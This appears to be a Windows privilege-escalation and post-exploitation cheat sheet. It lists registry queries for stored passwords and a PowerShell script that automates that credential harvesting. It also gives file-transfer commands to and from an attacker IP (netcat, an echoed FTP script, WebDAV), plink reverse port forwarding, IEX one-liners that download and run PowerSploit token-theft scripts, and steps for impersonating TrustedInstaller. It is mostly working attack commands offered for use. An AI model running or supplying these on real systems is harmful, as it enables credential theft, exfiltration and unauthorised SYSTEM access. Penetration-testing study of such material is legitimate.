    • Command# reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
    • Info: When AlwaysInstallElevated is 1 under both HKCU and HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer, any user can install a backdoor .msi and it runs as SYSTEM; check the HKLM key as well, one hive alone is not enough
    • Command# reg query "HKCU\Software\ORL\WinVNC3\Password"
    • Info: Checks for a VNC password in the registry (this HKCU key is readable by the current user; the value is obfuscated with a fixed DES key and is trivially decoded)
    • Command# reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
    • Info: Checks for autologon credentials (DefaultUserName, DefaultPassword, AutoAdminLogon)
    • Command# reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
    • Info: Checks SNMP community strings (requires admin access)
    • Command# reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
    • Info: Checks PuTTY saved sessions (HKCU, readable by the current user): host names, user names, key file paths and any proxy passwords, which PuTTY stores in clear
    • Command#  reg query HKLM /f password /t REG_SZ /s
    • Command#  reg query HKCU /f password /t REG_SZ /s
    • Info: Search for password in registry
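The reg query commands above are easy to misread when a key is simply absent, and the AlwaysInstallElevated check needs both hives. The PowerShell below is an added example, not code from the original page, that wraps the same registry locations in functions returning objects: the two-hive AlwaysInstallElevated test, the Winlogon autologon values, the PuTTY sessions, and a string-value search equivalent to reg query /f password /t REG_SZ /s. It only touches the keys the page lists; the HKLM half of AlwaysInstallElevated is the one addition, because the MSI elevation only works when both hives agree.

```powershell
# Added example (not from the original page). Reads only the registry locations
# listed above plus the HKLM half of AlwaysInstallElevated.
function Get-RegValue {
    param([Parameter(Mandatory)][string]$Key, [Parameter(Mandatory)][string]$Name)
    # Return $null rather than an error when the key or value is missing
    try { (Get-ItemProperty -Path $Key -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

function Test-AlwaysInstallElevated {
    # Both values must be 1; a single hive set to 1 does nothing
    $hklm = Get-RegValue 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer' 'AlwaysInstallElevated'
    $hkcu = Get-RegValue 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer' 'AlwaysInstallElevated'
    [pscustomobject]@{ HKLM = $hklm; HKCU = $hkcu; Exploitable = ($hklm -eq 1 -and $hkcu -eq 1) }
}

function Get-AutoLogonCreds {
    $k = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    [pscustomobject]@{
        AutoAdminLogon  = Get-RegValue $k 'AutoAdminLogon'
        DefaultDomain   = Get-RegValue $k 'DefaultDomainName'
        DefaultUserName = Get-RegValue $k 'DefaultUserName'
        # Empty when the password was stored in the LSA secret DefaultPassword instead
        DefaultPassword = Get-RegValue $k 'DefaultPassword'
    }
}

function Get-PuttySessions {
    # Saved sessions live under HKCU and need no admin rights; ProxyPassword is clear text
    Get-ChildItem 'HKCU:\Software\SimonTatham\PuTTY\Sessions' -ErrorAction SilentlyContinue | ForEach-Object {
        $p = Get-ItemProperty $_.PSPath
        [pscustomobject]@{
            Session       = $_.PSChildName
            Host          = $p.HostName
            User          = $p.UserName
            ProxyPassword = $p.ProxyPassword
            KeyFile       = $p.PublicKeyFile
        }
    }
}

function Search-RegistryForPasswords {
    param([string[]]$Hives = @('HKLM:\SOFTWARE', 'HKCU:\SOFTWARE'), [string]$Pattern = 'password')
    # Equivalent of 'reg query <hive> /f password /t REG_SZ /s': REG_SZ values
    # whose name or data matches. Recursing HKLM\SOFTWARE takes a while.
    foreach ($hive in $Hives) {
        Get-ChildItem -Path $hive -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
            $key = $_
            foreach ($name in $key.GetValueNames()) {
                if ($key.GetValueKind($name) -ne 'String') { continue }
                $data = $key.GetValue($name)
                if ($name -match $Pattern -or $data -match $Pattern) {
                    [pscustomobject]@{ Key = $key.Name; Value = $name; Data = $data }
                }
            }
        }
    }
}

Test-AlwaysInstallElevated
Get-AutoLogonCreds
Get-PuttySessions | Format-Table -AutoSize
Search-RegistryForPasswords -Hives 'HKCU:\SOFTWARE' | Format-Table -AutoSize
```

Unlike reg query, a missing key shows up as an empty field rather than an error line, which makes the output usable as input to other tooling.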
  • DLL Injection
  • Networking
    • Command# ipconfig /all
    • Info: List IP Configuration
    • Command# ipconfig /displaydns
    • Info: Display dns cache
    • Command# netstat -ano
    • Info: Lists listening ports and active connections together with the owning process ID
    • Command# ping x.x.x.255
    • Command# arp -a
    • Info: Ping the broadcast address and then use arp -a to list the hosts that answered (most Windows hosts ignore broadcast pings, so a sweep of the individual addresses is more reliable)
    • Info: arp -a also prints MAC addresses, which can be used for spoofing techniques
    • Command# route print
    • Info: Print routing information
    • Command# netsh dump
    • Info: Dump network configuration
    • Command# netsh firewall show state
    • Command# netsh firewall show config
    • Command# netsh advfirewall firewall show rule name=all
    • Info: Display firewall configuration
    • Command# reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
    • Info: Display SNMP configuration
    • Command# net share
    • Info: After listing shares, run icacls on each share path to check its permissions
    • Command: type C:\WINDOWS\System32\drivers\etc\hosts
  • File Transfer Techniques
    • Command# powershell -c (New-Object System.Net.WebClient).DownloadFile('http://<attacker ip>/nc.exe','nc.exe')
    • Command# nc -w 10 <destination_ip> <port> < <file>
    • Command# nc -lvp <port> > <file>
    • Info: The first command sends a file to a listener; the second receives it
    • Reference: https://nakkaya.com/2009/04/15/using-netcat-for-file-transfers/
    • Command# echo open <attacker IP> 21> ftp.txt
    • Command# echo USER username password >> ftp.txt
    • Command# echo bin >> ftp.txt
    • Command# echo GET <file.exe> >> ftp.txt
    • Command# echo bye >> ftp.txt
    • Command# ftp -v -n -s:ftp.txt
    • Info: On restricted systems echo can be used to write an ftp transfer script; -n disables auto-login so the USER line is processed as a command rather than swallowed by the login prompt. To send files to the attacker change GET to PUT
    • Command# pip install wsgidav cheroot 
    • Info: Install wsgidav on the attacker machine, then mkdir /tmp/transfer_files and chmod -R 777 /tmp/transfer_files
    • Command# wsgidav --host=0.0.0.0 --port=80 --root=/tmp/transfer_files
    • Info: On the attacker machine start wsgidav service
    • Command# net use <drive_letter> http://<attacker ip>/
    • Info: On the target, mount the attacker's WebDAV share as a drive (use * instead of a letter to take the next free one)
  • Remote Port Forwarding
    • Command# plink.exe -l <attacker_username> -pw <attacker_password> -C -R <port-to-open-on-attacker>:<target-ip-inside-network>:<target-port> <attacker_ipaddress>
    • Example: plink.exe -l root -pw root -C -R 135:10.10.102.103:135 10.10.102.56
    • Info: Run from the dual-homed pivot host: the SSH connection to the attacker (10.10.102.56) opens port 135 on the attacker's loopback, and connections to it are forwarded through the pivot to 10.10.102.103:135 inside the restricted network. The attacker password on the command line ends up in the pivot's process list and command history, so use a throwaway account
  • Tunneling
  • UAC LPE Bugs
  • PowerShell Applocker Bypass
  • OS Specific LPE Attacks
  • NTLM Authentication Spoofing Attack
  • Elevating Administrator To System
    • Command# IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-TokenManipulation.ps1');Invoke-TokenManipulation -Enumerate
    • Info: Requires administrator privileges and a PowerShell session; enumerates the logon tokens present on the host that can be impersonated
    • Command# IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-TokenManipulation.ps1');Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "nt authority\system"
    • Info: Requires administrator privileges and a PowerShell session; duplicates a SYSTEM token and spawns cmd.exe under it
    • Command# IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/HarmJ0y/Misc-PowerShell/master/Get-System.ps1');Get-System -ServiceName 'PrivescSvc' -PipeName 'secret'
    • Info: Requires administrator privileges and a PowerShell session; uses named pipe impersonation with a custom service and pipe name to elevate the current thread token to SYSTEM, requires SeImpersonatePrivilege
    • Command# IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/HarmJ0y/Misc-PowerShell/master/Get-System.ps1');Get-System -Technique Token
    • Info: Requires administrator privileges and a PowerShell session; uses token duplication to elevate the current thread token to SYSTEM, requires SeDebugPrivilege
    • Command# IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/HarmJ0y/Misc-PowerShell/master/Get-System.ps1');Get-System 
    • Info: Requires administrator privileges and a PowerShell session; uses named pipe impersonation (the default technique) to elevate the current thread token to SYSTEM, requires SeImpersonatePrivilege
Race Condition Attacks
Automation Scripts
  • Command# powershell -nop -c IEX (New-Object Net.Webclient).downloadstring("""https://raw.githubusercontent.com/threatexpress/red-team-scripts/master/HostEnum.ps1""");Invoke-HostEnum -ALL
  • Info: Windows privilege escalation enumeration script
  • Reference: Windows Priv ToolBox https://goo.gl/ZX2zAY and https://goo.gl/xYFi41
  • Reference: GhostPack https://github.com/GhostPack
Info: DLL hijack scanner
https://github.com/Cybereason/siofra
Info: winrs (Windows Remote Shell)
https://ss64.com/nt/winrs.html
Resources:
https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
http://hackingandsecurity.blogspot.com/2017/09/oscp-windows-priviledge-escalation.html
http://www.fuzzysecurity.com/tutorials/16.html
Info: Common Windows DLLs Used for DLL Hijacking
http://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
Info: Useful Red Team TIPS
https://github.com/vysec/RedTips/blob/master/README.md
Info: Restoring Active Directory from ntds.dit file, load into read only domain controller
https://www.dell.com/support/article/us/en/19/sln289101/windows-server-active-directory-database-repair-after-domain-controller-failure?lang=en
Info: Offline AD attacks
https://www.dsinternals.com/wp-content/uploads/HIP_AD_Offline_Attacks.pdf
Red Team Tips
Impersonating TrustedInstaller 

Install and import NtObjectManager (https://github.com/google/sandbox-attacksurface-analysis-tools/blob/master/NtObjectManager/NtObjectManager.psm1) in an elevated PowerShell session, then execute:

  • Import-Module NtObjectManager
  • Set-NtTokenPrivilege SeDebugPrivilege (needed to open the target process)
  • Start-Service TrustedInstaller (or any service you want to impersonate)
  • $p = Get-NtProcess -Name TrustedInstaller.exe (any process you want to impersonate, or the service process started in the previous step)
  • $t = $p.OpenToken()
  • $t.Groups | Where-Object {$_.Sid.Name -match "TrustedInstaller"} (queries the SID of the target to confirm the token carries the TrustedInstaller group)
  • $proc = New-Win32Process cmd.exe -CreationFlags NewConsole -ParentProcess $p (the new cmd.exe inherits the TrustedInstaller token because its parent is set to that process)



